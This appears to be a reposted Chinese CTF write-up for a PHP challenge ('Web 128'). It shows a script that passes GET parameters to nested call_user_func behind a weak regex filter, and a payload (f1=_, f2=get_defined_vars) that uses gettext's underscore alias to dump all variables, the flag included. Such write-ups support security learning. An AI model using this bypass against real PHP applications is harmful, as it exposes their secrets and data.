php特性之回撥函式與_函式
阿新 • • 發佈:2022-04-03
Web 128
摘自https://blog.csdn.net/qq_49480008/article/details/113753951,僅作個人收藏學習!
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-10 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-12 19:49:05 */ error_reporting(0); include("flag.php"); highlight_file(__FILE__); $f1 = $_GET['f1']; $f2 = $_GET['f2']; if(check($f1)){ var_dump(call_user_func(call_user_func($f1,$f2))); }else{ echo "嗯哼?"; } function check($str){ return !preg_match('/[0-9]|[a-z]/i', $str); } NULL
事先需要知道的知識:
call_user_func函式
get_defined_vars函式
GetText函式
解題思路:
var_dump(call_user_func(call_user_func($f1,$f2)));
call_user_func ( callable $callback , mixed $parameter = ? , mixed $... = ? ) : mixed
第一個引數 callback 是被呼叫的回撥函式
,其餘引數是回撥函式的引數
get_defined_vars — 返回由所有已定義變數所組成的陣列
printf(gettext("My name is %s.\n"), my_name); 等價於 printf(_("My name is %s.\n"), my_name);
所以可構造playload:
?f1=_&f2=get_defined_vars
var_dump(call_user_func(call_user_func($f1,$f2)));
=> var_dump(call_user_func(call_user_func(_,'get_defined_vars')));
=> var_dump(call_user_func(get_defined_vars));